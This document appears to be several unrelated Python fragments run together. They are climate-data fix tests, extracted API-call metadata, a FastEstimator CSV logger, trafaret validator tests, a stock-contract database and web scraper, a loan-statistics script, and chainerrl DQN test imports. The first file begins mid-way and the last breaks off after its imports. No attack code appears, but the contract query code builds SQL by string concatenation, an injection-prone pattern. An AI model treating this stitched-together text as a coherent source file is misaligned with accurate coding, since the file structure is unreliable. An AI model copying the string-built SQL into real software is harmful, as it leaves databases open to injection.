"""Test fix for ``cli``."""
assert Cli is Cl
def test_get_clw_fix():
"""Test getting of fix."""
fix = Fix.get_fixes('CMIP6', 'ACCESS-ESM1-5', 'Amon', 'clw')
assert fix == [Clw(None)]
def test_clw_fix():
"""Test fix for ``clw``."""
assert Clw is Cl
@pytest.fixture
def cubes_with_wrong_air_pressure():
"""Cubes with wrong ``air_pressure`` coordinate."""
air_pressure_coord = iris.coords.DimCoord(
[1000.09, 600.6, 200.0],
bounds=[[1200.00001, 800], [800, 400.8], [400.8, 1.9]],
var_name='plev',
standard_name='air_pressure',
units='pa',
)
hus_cube = iris.cube.Cube(
[0.0, 1.0, 2.0],
var_name='hus',
dim_coords_and_dims=[(air_pressure_coord, 0)],
)
zg_cube = hus_cube.copy()
zg_cube.var_name = 'zg'
return iris.cube.CubeList([hus_cube, zg_cube])
def test_get_hus_fix():
"""Test getting of fix."""
fix = Fix.get_fixes('CMIP6', 'ACCESS-ESM1-5', 'Amon', 'hus')
assert fix == [Hus(None)]
def test_hus_fix_metadata(cubes_with_wrong_air_pressure):
"""Test ``fix_metadata`` for ``hus``."""
vardef = get_var_info('CMIP6', 'Amon', 'hus')
fix = Hus(vardef)
out_cubes = fix.fix_metadata(cubes_with_wrong_air_pressure)
assert len(out_cubes) == 2
hus_cube = out_cubes.extract_cube('hus')
zg_cube = out_cubes.extract_cube('zg')
assert hus_cube.var_name == 'hus'
assert zg_cube.var_name == 'zg'
np.testing.assert_allclose(hus_cube.coord('air_pressure').points,
[1000.0, 601.0, 200.0])
np.testing.assert_allclose(hus_cube.coord('air_pressure').bounds,
[[1200.0, 800.0], [800.0, 401.0], [401.0, 2.0]])
np.testing.assert_allclose(zg_cube.coord('air_pressure').points,
[1000.09, 600.6, 200.0])
np.testing.assert_allclose(zg_cube.coord('air_pressure').bounds,
[[1200.00001, 800], [800, 400.8], [400.8, 1.9]])
def test_get_zg_fix():
"""Test getting of fix."""
fix = Fix.get_fixes('CMIP6', 'ACCESS-ESM1-5', 'Amon', 'zg')
assert fix == [Zg(None)]
def test_zg_fix_metadata(cubes_with_wrong_air_pressure):
"""Test ``fix_metadata`` for ``zg``."""
vardef = get_var_info('CMIP6', 'Amon', 'zg')
fix = Zg(vardef)
out_cubes = fix.fix_metadata(cubes_with_wrong_air_pressure)
assert len(out_cubes) == 2
hus_cube = out_cubes.extract_cube('hus')
zg_cube = out_cubes.extract_cube('zg')
assert hus_cube.var_name == 'hus'
assert zg_cube.var_name == 'zg'
np.testing.assert_allclose(hus_cube.coord('air_pressure').points,
[1000.09, 600.6, 200.0])
np.testing.assert_allclose(hus_cube.coord('air_pressure').bounds,
[[1200.00001, 800], [800, 400.8], [400.8, 1.9]])
np.testing.assert_allclose(zg_cube.coord('air_pressure').points,
[1000.0, 601.0, 200.0])
np.testing.assert_allclose(zg_cube.coord('air_pressure').bounds,
[[1200.0, 800.0], [800.0, 401.0], [401.0, 2.0]])
|
[
"esmvalcore.cmor._fixes.cmip6.access_esm1_5.Zg",
"numpy.zeros_like",
"numpy.ones_like",
"esmvalcore.cmor._fixes.cmip6.access_esm1_5.Clw",
"iris.cube.CubeList",
"esmvalcore.cmor._fixes.cmip6.access_esm1_5.Cli",
"esmvalcore.cmor.fix.Fix.get_fixes",
"esmvalcore.cmor._fixes.cmip6.access_esm1_5.Hus",
"iris.coords.DimCoord",
"esmvalcore.cmor._fixes.cmip6.access_esm1_5.Cl",
"iris.cube.Cube",
"esmvalcore.cmor.table.get_var_info",
"numpy.testing.assert_allclose"
] |
[((2777, 2803), 'iris.cube.CubeList', 'iris.cube.CubeList', (['[cube]'], {}), '([cube])\n', (2795, 2803), False, 'import iris\n'), ((2870, 2923), 'esmvalcore.cmor.fix.Fix.get_fixes', 'Fix.get_fixes', (['"""CMIP6"""', '"""ACCESS-ESM1-5"""', '"""Amon"""', '"""cl"""'], {}), "('CMIP6', 'ACCESS-ESM1-5', 'Amon', 'cl')\n", (2883, 2923), False, 'from esmvalcore.cmor.fix import Fix\n'), ((3255, 3263), 'esmvalcore.cmor._fixes.cmip6.access_esm1_5.Cl', 'Cl', (['None'], {}), '(None)\n', (3257, 3263), False, 'from esmvalcore.cmor._fixes.cmip6.access_esm1_5 import Cl, Cli, Clw, Hus, Zg\n'), ((3356, 3408), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['b_coord.points', 'B_POINTS'], {}), '(b_coord.points, B_POINTS)\n', (3382, 3408), True, 'import numpy as np\n'), ((3413, 3465), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['b_coord.bounds', 'B_BOUNDS'], {}), '(b_coord.bounds, B_BOUNDS)\n', (3439, 3465), True, 'import numpy as np\n'), ((3635, 3689), 'esmvalcore.cmor.fix.Fix.get_fixes', 'Fix.get_fixes', (['"""CMIP6"""', '"""ACCESS-ESM1-5"""', '"""Amon"""', '"""cli"""'], {}), "('CMIP6', 'ACCESS-ESM1-5', 'Amon', 'cli')\n", (3648, 3689), False, 'from esmvalcore.cmor.fix import Fix\n'), ((3862, 3916), 'esmvalcore.cmor.fix.Fix.get_fixes', 'Fix.get_fixes', (['"""CMIP6"""', '"""ACCESS-ESM1-5"""', '"""Amon"""', '"""clw"""'], {}), "('CMIP6', 'ACCESS-ESM1-5', 'Amon', 'clw')\n", (3875, 3916), False, 'from esmvalcore.cmor.fix import Fix\n'), ((4158, 4328), 'iris.coords.DimCoord', 'iris.coords.DimCoord', (['[1000.09, 600.6, 200.0]'], {'bounds': '[[1200.00001, 800], [800, 400.8], [400.8, 1.9]]', 'var_name': '"""plev"""', 'standard_name': '"""air_pressure"""', 'units': '"""pa"""'}), "([1000.09, 600.6, 200.0], bounds=[[1200.00001, 800], [\n 800, 400.8], [400.8, 1.9]], var_name='plev', standard_name=\n 'air_pressure', units='pa')\n", (4178, 4328), False, 'import iris\n'), ((4381, 4480), 'iris.cube.Cube', 'iris.cube.Cube', (['[0.0, 1.0, 2.0]'], {'var_name': 
'"""hus"""', 'dim_coords_and_dims': '[(air_pressure_coord, 0)]'}), "([0.0, 1.0, 2.0], var_name='hus', dim_coords_and_dims=[(\n air_pressure_coord, 0)])\n", (4395, 4480), False, 'import iris\n'), ((4576, 4615), 'iris.cube.CubeList', 'iris.cube.CubeList', (['[hus_cube, zg_cube]'], {}), '([hus_cube, zg_cube])\n', (4594, 4615), False, 'import iris\n'), ((4683, 4737), 'esmvalcore.cmor.fix.Fix.get_fixes', 'Fix.get_fixes', (['"""CMIP6"""', '"""ACCESS-ESM1-5"""', '"""Amon"""', '"""hus"""'], {}), "('CMIP6', 'ACCESS-ESM1-5', 'Amon', 'hus')\n", (4696, 4737), False, 'from esmvalcore.cmor.fix import Fix\n'), ((4886, 4922), 'esmvalcore.cmor.table.get_var_info', 'get_var_info', (['"""CMIP6"""', '"""Amon"""', '"""hus"""'], {}), "('CMIP6', 'Amon', 'hus')\n", (4898, 4922), False, 'from esmvalcore.cmor.table import get_var_info\n'), ((4933, 4944), 'esmvalcore.cmor._fixes.cmip6.access_esm1_5.Hus', 'Hus', (['vardef'], {}), '(vardef)\n', (4936, 4944), False, 'from esmvalcore.cmor._fixes.cmip6.access_esm1_5 import Cl, Cli, Clw, Hus, Zg\n'), ((5817, 5870), 'esmvalcore.cmor.fix.Fix.get_fixes', 'Fix.get_fixes', (['"""CMIP6"""', '"""ACCESS-ESM1-5"""', '"""Amon"""', '"""zg"""'], {}), "('CMIP6', 'ACCESS-ESM1-5', 'Amon', 'zg')\n", (5830, 5870), False, 'from esmvalcore.cmor.fix import Fix\n'), ((6016, 6051), 'esmvalcore.cmor.table.get_var_info', 'get_var_info', (['"""CMIP6"""', '"""Amon"""', '"""zg"""'], {}), "('CMIP6', 'Amon', 'zg')\n", (6028, 6051), False, 'from esmvalcore.cmor.table import get_var_info\n'), ((6062, 6072), 'esmvalcore.cmor._fixes.cmip6.access_esm1_5.Zg', 'Zg', (['vardef'], {}), '(vardef)\n', (6064, 6072), False, 'from esmvalcore.cmor._fixes.cmip6.access_esm1_5 import Cl, Cli, Clw, Hus, Zg\n'), ((2409, 2432), 'numpy.zeros_like', 'np.zeros_like', (['B_POINTS'], {}), '(B_POINTS)\n', (2422, 2432), True, 'import numpy as np\n'), ((2585, 2607), 'numpy.ones_like', 'np.ones_like', (['B_POINTS'], {}), '(B_POINTS)\n', (2597, 2607), True, 'import numpy as np\n'), ((2476, 2499), 
'numpy.zeros_like', 'np.zeros_like', (['B_BOUNDS'], {}), '(B_BOUNDS)\n', (2489, 2499), True, 'import numpy as np\n'), ((2943, 2951), 'esmvalcore.cmor._fixes.cmip6.access_esm1_5.Cl', 'Cl', (['None'], {}), '(None)\n', (2945, 2951), False, 'from esmvalcore.cmor._fixes.cmip6.access_esm1_5 import Cl, Cli, Clw, Hus, Zg\n'), ((3709, 3718), 'esmvalcore.cmor._fixes.cmip6.access_esm1_5.Cli', 'Cli', (['None'], {}), '(None)\n', (3712, 3718), False, 'from esmvalcore.cmor._fixes.cmip6.access_esm1_5 import Cl, Cli, Clw, Hus, Zg\n'), ((3936, 3945), 'esmvalcore.cmor._fixes.cmip6.access_esm1_5.Clw', 'Clw', (['None'], {}), '(None)\n', (3939, 3945), False, 'from esmvalcore.cmor._fixes.cmip6.access_esm1_5 import Cl, Cli, Clw, Hus, Zg\n'), ((4757, 4766), 'esmvalcore.cmor._fixes.cmip6.access_esm1_5.Hus', 'Hus', (['None'], {}), '(None)\n', (4760, 4766), False, 'from esmvalcore.cmor._fixes.cmip6.access_esm1_5 import Cl, Cli, Clw, Hus, Zg\n'), ((5890, 5898), 'esmvalcore.cmor._fixes.cmip6.access_esm1_5.Zg', 'Zg', (['None'], {}), '(None)\n', (5892, 5898), False, 'from esmvalcore.cmor._fixes.cmip6.access_esm1_5 import Cl, Cli, Clw, Hus, Zg\n')]
|
# Copyright 2019 The FastEstimator Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
from collections import defaultdict
from typing import List, Optional, Union, Iterable
import pandas as pd
from fastestimator.trace.trace import Trace
from fastestimator.util.data import Data
from fastestimator.util.traceability_util import traceable
@traceable()
class CSVLogger(Trace):
    """Log monitored quantities in a CSV file.

    Args:
        filename: Output filename.
        monitor_names: List of keys to monitor. If None then all metrics will be recorded.
        mode: What mode(s) to execute this Trace in. For example, "train", "eval", "test", or "infer". To execute
            regardless of mode, pass None. To execute in all modes except for a particular one, you can pass an argument
            like "!infer" or "!train".
    """
    def __init__(self,
                 filename: str,
                 monitor_names: Optional[Union[List[str], str]] = None,
                 mode: Union[None, str, Iterable[str]] = ("eval", "test")) -> None:
        super().__init__(inputs="*" if monitor_names is None else monitor_names, mode=mode)
        self.filename = filename
        self.data = None

    def on_begin(self, data: Data) -> None:
        # Start every run with a fresh column -> list-of-values mapping.
        self.data = defaultdict(list)

    def on_epoch_end(self, data: Data) -> None:
        self.data["mode"].append(self.system.mode)
        self.data["epoch"].append(self.system.epoch_idx)
        if "*" in self.inputs:
            # Record everything that was written to the log this epoch.
            for key, value in data.read_logs().items():
                self.data[key].append(value)
        else:
            for key in self.inputs:
                self.data[key].append(data[key])

    def on_end(self, data: Data) -> None:
        df = pd.DataFrame(data=self.data)
        if os.path.exists(self.filename):
            # Append without repeating the header row; `to_csv` writes the
            # header by default, which would insert a second header line in
            # the middle of an existing CSV and break downstream parsing.
            df.to_csv(self.filename, mode='a', index=False, header=False)
        else:
            df.to_csv(self.filename, index=False)
|
[
"collections.defaultdict",
"fastestimator.util.traceability_util.traceable",
"os.path.exists",
"pandas.DataFrame"
] |
[((958, 969), 'fastestimator.util.traceability_util.traceable', 'traceable', ([], {}), '()\n', (967, 969), False, 'from fastestimator.util.traceability_util import traceable\n'), ((1886, 1903), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (1897, 1903), False, 'from collections import defaultdict\n'), ((2348, 2376), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'self.data'}), '(data=self.data)\n', (2360, 2376), True, 'import pandas as pd\n'), ((2388, 2417), 'os.path.exists', 'os.path.exists', (['self.filename'], {}), '(self.filename)\n', (2402, 2417), False, 'import os\n')]
|
from unittest import TestCase
import trafaret as t
from trafaret_validator import TrafaretValidator
class ValidatorForTest(TrafaretValidator):
    # Trafaret instance: should be collected into ``_validators`` by the metaclass.
    t_value = t.Int()
    # Plain (non-trafaret) attribute: must be left out of ``_validators``.
    value = 5
class ValidatorForTest2(ValidatorForTest):
    # Subclass adds one more trafaret field; inherited ``t_value`` must be kept.
    test = t.String()
class TestMetaclass(TestCase):
    """Checks that the validator metaclass collects trafaret fields correctly."""

    def _assert_validator_state(self, validator_cls, expected_keys):
        # Shared assertions for any TrafaretValidator subclass: the declared
        # trafaret fields are collected, plain attributes are ignored, and
        # the class starts with empty data/error containers.
        self.assertIsInstance(validator_cls._validators, dict,
                              'Value should be instance of dict')
        for key in expected_keys:
            self.assertIn(key, validator_cls._validators,
                          'Value should be in _validators')
        self.assertNotIn('value', validator_cls._validators,
                         'Value should not be in _validators')
        self.assertIsInstance(validator_cls._trafaret, t.Trafaret,
                              'Value should be instance of Trafaret')
        self.assertFalse(validator_cls._data,
                         '_data should be empty')
        self.assertFalse(validator_cls._errors,
                         '_data should be empty')

    def test_metaclass(self):
        self._assert_validator_state(ValidatorForTest, ('t_value',))

    def test_inheritance(self):
        self._assert_validator_state(ValidatorForTest2, ('t_value', 'test'))
|
[
"trafaret.String",
"trafaret.Int"
] |
[((161, 168), 'trafaret.Int', 't.Int', ([], {}), '()\n', (166, 168), True, 'import trafaret as t\n'), ((239, 249), 'trafaret.String', 't.String', ([], {}), '()\n', (247, 249), True, 'import trafaret as t\n')]
|
import sqlite3
import time
from bs4 import BeautifulSoup
from numpy.core import numeric
import requests
import logging
import enlighten
from barbucket.database import DatabaseConnector
from barbucket.tools import GracefulExiter
class ContractsDatabase():
    """CRUD helpers for the 'contracts' table of the barbucket database."""

    def __init__(self):
        pass

    def create_contract(self, contract_type_from_listing, exchange_symbol,
                        broker_symbol, name, currency, exchange):
        """Insert a single new contract row into the 'contracts' table."""
        logging.debug(f"Creating new contract {contract_type_from_listing}_{exchange}_{broker_symbol}_{currency}.")
        db_connector = DatabaseConnector()
        conn = db_connector.connect()
        cur = conn.cursor()
        cur.execute("""INSERT INTO contracts (
                    contract_type_from_listing,
                    exchange_symbol,
                    broker_symbol,
                    name,
                    currency,
                    exchange)
                    VALUES (?, ?, ?, ?, ?, ?)""", (
                    contract_type_from_listing,
                    exchange_symbol,
                    broker_symbol,
                    name,
                    currency,
                    exchange))
        conn.commit()
        cur.close()
        db_connector.disconnect(conn)

    def get_contracts(self, filters=None, return_columns=None):
        """Query contracts from the 'all_contract_info' view.

        Args:
            filters: Mapping of column name -> value for the WHERE clause.
                The special value "NULL" selects rows where the column IS NULL.
            return_columns: Column names to select; all columns if empty.

        Returns:
            A list of sqlite3.Row objects.
        """
        # 'None' defaults avoid the shared-mutable-default-argument pitfall;
        # semantics for callers are unchanged.
        if filters is None:
            filters = {}
        if return_columns is None:
            return_columns = []
        # Prepare query to get requested values from db.
        # NOTE: filter values are interpolated into the SQL string. This is
        # acceptable only for trusted internal callers; parameterized queries
        # would be required before exposing this to untrusted input.
        query = "SELECT * FROM all_contract_info"
        if len(return_columns) > 0:
            cols = ", ".join(return_columns)
            query = query.replace("*", cols)
        if len(filters) > 0:
            conditions = []
            for key, value in filters.items():
                if value == "NULL":
                    conditions.append(key + " IS " + str(value))
                elif isinstance(value, str):
                    conditions.append(key + " = '" + str(value) + "'")
                elif isinstance(value, (int, float)):
                    conditions.append(key + " = " + str(value))
            query += " WHERE " + " and ".join(conditions)
        query += ";"
        # Get requested values from db
        logging.debug(f"Getting contracts from database with query: {query}")
        db_connector = DatabaseConnector()
        conn = db_connector.connect()
        conn.row_factory = sqlite3.Row
        cur = conn.cursor()
        cur.execute(query)
        contracts = cur.fetchall()
        conn.commit()
        cur.close()
        db_connector.disconnect(conn)
        return contracts

    def delete_contract(self, exchange, symbol, currency):
        """Delete the contract identified by (broker symbol, exchange, currency)."""
        db_connector = DatabaseConnector()
        conn = db_connector.connect()
        cur = conn.cursor()
        cur.execute("""DELETE FROM contracts
                    WHERE (broker_symbol = ?
                        AND exchange = ?
                        AND currency = ?);""",
                    (symbol,
                    exchange,
                    currency))
        conn.commit()
        cur.close()
        db_connector.disconnect(conn)

    def delete_contract_id(self, contract_id):
        """Delete the contract with the given primary key."""
        db_connector = DatabaseConnector()
        conn = db_connector.connect()
        cur = conn.cursor()
        # sqlite3 requires the parameters to be a sequence; passing the bare
        # scalar raises (or, for a multi-character string, binds wrongly).
        cur.execute("""DELETE FROM contracts
                    WHERE contract_id = ?;""",
                    (contract_id,))
        conn.commit()
        cur.close()
        db_connector.disconnect(conn)
class IbExchangeListings():
    """Scrapes stock contract listings from the Interactive Brokers website."""

    def __init__(self):
        pass

    def read_ib_exchange_listing_singlepage(self, ctype, exchange):
        # Download and parse a single-page IB exchange listing.
        # Returns a list of dicts, one per listed contract.
        url = f"https://www.interactivebrokers.com/en/index.php?f=567"\
            + f"&exch={exchange}"
        html = requests.get(url).text
        # Correct error from IB: stray closing </a> tags in plain symbol
        # cells (cells without an href) break the table parsing.
        old_lines = html.splitlines()
        new_lines = []
        corrections = 0
        for line in old_lines:
            if (' <td align="left" valign="middle">' in line)\
                and ("href" not in line):
                line = line.replace("</a>","")
                corrections += 1
            new_lines.append(line)
        html = "".join(new_lines)
        # NOTE(review): joining with "" drops the original line breaks;
        # presumably harmless for the HTML parser, but "\n".join would
        # preserve the page structure — confirm before changing.
        if corrections == 0:
            logging.info(f"IB error for singlepage listings no longer present.")
        soup = BeautifulSoup(html, 'html.parser')
        # The third striped table on the page holds the contract rows.
        tables = soup.find_all('table', \
            class_='table table-striped table-bordered')
        rows = tables[2].tbody.find_all('tr')
        website_data = []
        for row in rows:
            cols = row.find_all('td')
            row_dict = {
                'type': ctype,
                'broker_symbol': cols[0].text.strip(),
                'name': cols[1].text.strip(),
                'exchange_symbol': cols[2].text.strip(),
                'currency': cols[3].text.strip(),
                'exchange': exchange.upper()}
            website_data.append(row_dict)
        return website_data

    def read_ib_exchange_listing_paginated(self, ctype, exchange):
        """
        Returns list of contracts
        Returns [] if aborted by user
        """
        website_data = []
        page = 1
        # Setup progress bar
        # manager = enlighten.get_manager()
        # pbar = manager.counter(total=len(contracts), desc="Contracts", unit="contracts")
        exiter = GracefulExiter()
        while True:
            # Get website (100 stock contracts per page)
            logging.info(f"Scraping IB exchange listing for {exchange}, page {page}.")
            url = f"https://www.interactivebrokers.com/en/index.php?f=2222"\
                + f"&exch={exchange}&showcategories=STK&p=&cc=&limit=100"\
                + f"&page={page}"
            html = requests.get(url).text
            # Correct error from IB: a duplicated closing </th> in the
            # table header; remove it so the parser sees a valid table.
            if "(click link for more details)</span></th>\n </th>" in html:
                html = html.replace(\
                    "(click link for more details)</span></th>\n </th>\n",\
                    "(click link for more details)</span></th>\n")
            else:
                logging.info(f"IB error for paginated listings no longer present.")
            # Parse HTML
            soup = BeautifulSoup(html, 'html.parser')
            tables = soup.find_all('table', \
                class_='table table-striped table-bordered')
            rows = tables[2].tbody.find_all('tr')
            # Empty table -> End is reached
            if rows == []:
                return website_data
            # Add data from this page to 'website_data'
            for row in rows:
                cols = row.find_all('td')
                row_dict = {
                    'type': ctype,
                    'broker_symbol': cols[0].text.strip(),
                    'name': cols[1].text.strip(),
                    'exchange_symbol': cols[2].text.strip(),
                    'currency': cols[3].text.strip(),
                    'exchange': exchange.upper()}
                website_data.append(row_dict)
            # Check for abort signal (e.g. Ctrl-C caught by GracefulExiter)
            if exiter.exit():
                logging.info(f"Exiting on user request.")
                return []
            # Prepare for next page
            page += 1
            time.sleep(3) #show some mercy to webserver
|
[
"barbucket.database.DatabaseConnector",
"logging.debug",
"barbucket.tools.GracefulExiter",
"time.sleep",
"logging.info",
"requests.get",
"bs4.BeautifulSoup"
] |
[((431, 548), 'logging.debug', 'logging.debug', (['f"""Creating new contract {contract_type_from_listing}_{exchange}_{broker_symbol}_{currency}."""'], {}), "(\n f'Creating new contract {contract_type_from_listing}_{exchange}_{broker_symbol}_{currency}.'\n )\n", (444, 548), False, 'import logging\n'), ((562, 581), 'barbucket.database.DatabaseConnector', 'DatabaseConnector', ([], {}), '()\n', (579, 581), False, 'from barbucket.database import DatabaseConnector\n'), ((2085, 2153), 'logging.debug', 'logging.debug', (['f"""Getting contracts from databse with query: {query}"""'], {}), "(f'Getting contracts from databse with query: {query}')\n", (2098, 2153), False, 'import logging\n'), ((2177, 2196), 'barbucket.database.DatabaseConnector', 'DatabaseConnector', ([], {}), '()\n', (2194, 2196), False, 'from barbucket.database import DatabaseConnector\n'), ((2556, 2575), 'barbucket.database.DatabaseConnector', 'DatabaseConnector', ([], {}), '()\n', (2573, 2575), False, 'from barbucket.database import DatabaseConnector\n'), ((3102, 3121), 'barbucket.database.DatabaseConnector', 'DatabaseConnector', ([], {}), '()\n', (3119, 3121), False, 'from barbucket.database import DatabaseConnector\n'), ((4231, 4265), 'bs4.BeautifulSoup', 'BeautifulSoup', (['html', '"""html.parser"""'], {}), "(html, 'html.parser')\n", (4244, 4265), False, 'from bs4 import BeautifulSoup\n'), ((5282, 5298), 'barbucket.tools.GracefulExiter', 'GracefulExiter', ([], {}), '()\n', (5296, 5298), False, 'from barbucket.tools import GracefulExiter\n'), ((3664, 3681), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (3676, 3681), False, 'import requests\n'), ((4146, 4214), 'logging.info', 'logging.info', (['f"""IB error for singlepage listings no longer present."""'], {}), "(f'IB error for singlepage listings no longer present.')\n", (4158, 4214), False, 'import logging\n'), ((5358, 5432), 'logging.info', 'logging.info', (['f"""Scraping IB exchange listing for {exchange}, page {page}."""'], {}), 
"(f'Scraping IB exchange listing for {exchange}, page {page}.')\n", (5370, 5432), False, 'import logging\n'), ((6146, 6180), 'bs4.BeautifulSoup', 'BeautifulSoup', (['html', '"""html.parser"""'], {}), "(html, 'html.parser')\n", (6159, 6180), False, 'from bs4 import BeautifulSoup\n'), ((7181, 7194), 'time.sleep', 'time.sleep', (['(3)'], {}), '(3)\n', (7191, 7194), False, 'import time\n'), ((5638, 5655), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (5650, 5655), False, 'import requests\n'), ((6033, 6100), 'logging.info', 'logging.info', (['f"""IB error for paginated listings no longer present."""'], {}), "(f'IB error for paginated listings no longer present.')\n", (6045, 6100), False, 'import logging\n'), ((7042, 7083), 'logging.info', 'logging.info', (['f"""Exiting on user request."""'], {}), "(f'Exiting on user request.')\n", (7054, 7083), False, 'import logging\n')]
|
import pandas as pd
import numpy as np
from pathlib import Path
from data_params import Data
from data_utils import (
preprocess_train_df,
fit_stats,
transform_stats,
save_transformed_stats,
)
def summarize_stats(csv_name, dir_to_data, stat_name_select):
    """Compare one descriptive statistic between funded and expired loans.

    Reads ``csv_name`` from ``dir_to_data`` (must contain a ``STATUS`` column
    with values "funded"/"expired"), extracts the ``stat_name_select`` row of
    ``DataFrame.describe`` per feature for each status, writes the merged
    result to ``funded_<csv_name>`` and returns it.

    Args:
        csv_name: Name of the input CSV file.
        dir_to_data: Directory holding the input file and receiving the output.
        stat_name_select: Name of the describe() row to extract (e.g. "mean").

    Returns:
        DataFrame with columns FeatureName, FeatureValueFunded,
        FeatureValueExpired.
    """
    path_to_input_df = Path(dir_to_data, csv_name)
    path_to_output_df = Path(dir_to_data, "funded_" + csv_name)

    df = pd.read_csv(path_to_input_df)

    def _stat_frame(status, value_column):
        # One row per feature with the selected statistic for the given STATUS.
        subset = df.loc[df["STATUS"] == status].drop(columns=["STATUS"])
        stat = subset.describe(include="all").loc[stat_name_select].to_frame()
        stat.reset_index(level=0, inplace=True)
        stat.columns = ["FeatureName", value_column]
        return stat

    funded_stat = _stat_frame("funded", "FeatureValueFunded")
    expired_stat = _stat_frame("expired", "FeatureValueExpired")
    funded_stat = funded_stat.merge(expired_stat, on="FeatureName")
    funded_stat.to_csv(path_to_output_df, index=False)
    return funded_stat
# %% ###########
# Resolve the run configuration from the shared parameter object.
data_par = Data()
cols_process = data_par.cols_process
cols_output = data_par.cols_output
valid_status = data_par.valid_status
dir_to_saved_data = data_par.dir_to_saved_data
dir_to_query_data = data_par.dir_to_query_data
path_to_training_data = data_par.path_to_training_data
stat_name_select = data_par.stat_name_select
predict = False
csv_name_tags = "stats_tags_df.csv"
csv_name_loanuse = "stats_loanuse_df.csv"
csv_name_desc = "stats_desc_df.csv"
# Load and clean the training data, then fit and apply the text statistics.
df = pd.read_csv(path_to_training_data, usecols=cols_process)
df = preprocess_train_df(df, valid_status, cols_output, predict)
fit_stats(dir_to_saved_data, df)
stats_tags_df, stats_loanuse_df, stats_desc_df = transform_stats(dir_to_saved_data, df)
# Persist the transformed statistics, one CSV per text field.
for stats_frame, stats_csv_name in (
    (stats_tags_df, csv_name_tags),
    (stats_loanuse_df, csv_name_loanuse),
    (stats_desc_df, csv_name_desc),
):
    save_transformed_stats(dir_to_saved_data, stats_frame, stats_csv_name)
# Compare funded vs expired statistics per text field and save the summaries.
funded_df_tags = summarize_stats(csv_name_tags, dir_to_saved_data, stat_name_select)
funded_df_loanuse = summarize_stats(csv_name_loanuse, dir_to_saved_data, stat_name_select)
funded_df_desc = summarize_stats(csv_name_desc, dir_to_saved_data, stat_name_select)
for summary_df, summary_csv_name in (
    (funded_df_tags, "funded_df_tags.csv"),
    (funded_df_loanuse, "funded_df_loanuse.csv"),
    (funded_df_desc, "funded_df_desc.csv"),
):
    summary_df.to_csv(Path(dir_to_saved_data, summary_csv_name), index=False)
|
[
"data_utils.save_transformed_stats",
"pandas.read_csv",
"data_utils.transform_stats",
"pathlib.Path",
"data_utils.fit_stats",
"data_utils.preprocess_train_df",
"data_params.Data"
] |
[((1374, 1380), 'data_params.Data', 'Data', ([], {}), '()\n', (1378, 1380), False, 'from data_params import Data\n'), ((1822, 1878), 'pandas.read_csv', 'pd.read_csv', (['path_to_training_data'], {'usecols': 'cols_process'}), '(path_to_training_data, usecols=cols_process)\n', (1833, 1878), True, 'import pandas as pd\n'), ((1885, 1944), 'data_utils.preprocess_train_df', 'preprocess_train_df', (['df', 'valid_status', 'cols_output', 'predict'], {}), '(df, valid_status, cols_output, predict)\n', (1904, 1944), False, 'from data_utils import preprocess_train_df, fit_stats, transform_stats, save_transformed_stats\n'), ((1946, 1978), 'data_utils.fit_stats', 'fit_stats', (['dir_to_saved_data', 'df'], {}), '(dir_to_saved_data, df)\n', (1955, 1978), False, 'from data_utils import preprocess_train_df, fit_stats, transform_stats, save_transformed_stats\n'), ((2028, 2066), 'data_utils.transform_stats', 'transform_stats', (['dir_to_saved_data', 'df'], {}), '(dir_to_saved_data, df)\n', (2043, 2066), False, 'from data_utils import preprocess_train_df, fit_stats, transform_stats, save_transformed_stats\n'), ((2067, 2138), 'data_utils.save_transformed_stats', 'save_transformed_stats', (['dir_to_saved_data', 'stats_tags_df', 'csv_name_tags'], {}), '(dir_to_saved_data, stats_tags_df, csv_name_tags)\n', (2089, 2138), False, 'from data_utils import preprocess_train_df, fit_stats, transform_stats, save_transformed_stats\n'), ((2139, 2216), 'data_utils.save_transformed_stats', 'save_transformed_stats', (['dir_to_saved_data', 'stats_loanuse_df', 'csv_name_loanuse'], {}), '(dir_to_saved_data, stats_loanuse_df, csv_name_loanuse)\n', (2161, 2216), False, 'from data_utils import preprocess_train_df, fit_stats, transform_stats, save_transformed_stats\n'), ((2217, 2288), 'data_utils.save_transformed_stats', 'save_transformed_stats', (['dir_to_saved_data', 'stats_desc_df', 'csv_name_desc'], {}), '(dir_to_saved_data, stats_desc_df, csv_name_desc)\n', (2239, 2288), False, 'from data_utils import 
preprocess_train_df, fit_stats, transform_stats, save_transformed_stats\n'), ((299, 326), 'pathlib.Path', 'Path', (['dir_to_data', 'csv_name'], {}), '(dir_to_data, csv_name)\n', (303, 326), False, 'from pathlib import Path\n'), ((351, 390), 'pathlib.Path', 'Path', (['dir_to_data', "('funded_' + csv_name)"], {}), "(dir_to_data, 'funded_' + csv_name)\n", (355, 390), False, 'from pathlib import Path\n'), ((401, 430), 'pandas.read_csv', 'pd.read_csv', (['path_to_input_df'], {}), '(path_to_input_df)\n', (412, 430), True, 'import pandas as pd\n'), ((2595, 2640), 'pathlib.Path', 'Path', (['dir_to_saved_data', '"""funded_df_tags.csv"""'], {}), "(dir_to_saved_data, 'funded_df_tags.csv')\n", (2599, 2640), False, 'from pathlib import Path\n'), ((2698, 2746), 'pathlib.Path', 'Path', (['dir_to_saved_data', '"""funded_df_loanuse.csv"""'], {}), "(dir_to_saved_data, 'funded_df_loanuse.csv')\n", (2702, 2746), False, 'from pathlib import Path\n'), ((2798, 2843), 'pathlib.Path', 'Path', (['dir_to_saved_data', '"""funded_df_desc.csv"""'], {}), "(dir_to_saved_data, 'funded_df_desc.csv')\n", (2802, 2843), False, 'from pathlib import Path\n')]
|
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from future import standard_library
from builtins import * # NOQA
standard_library.install_aliases() # NOQA
import unittest
from chainer import testing
import numpy as np
import basetest_dqn_like as base
import chainerrl
from chainerrl.agents.dqn import compute_value_loss
from chainerrl.agents.dqn import compute_weighted_value_loss
from chainerrl.agents.dqn import DQN
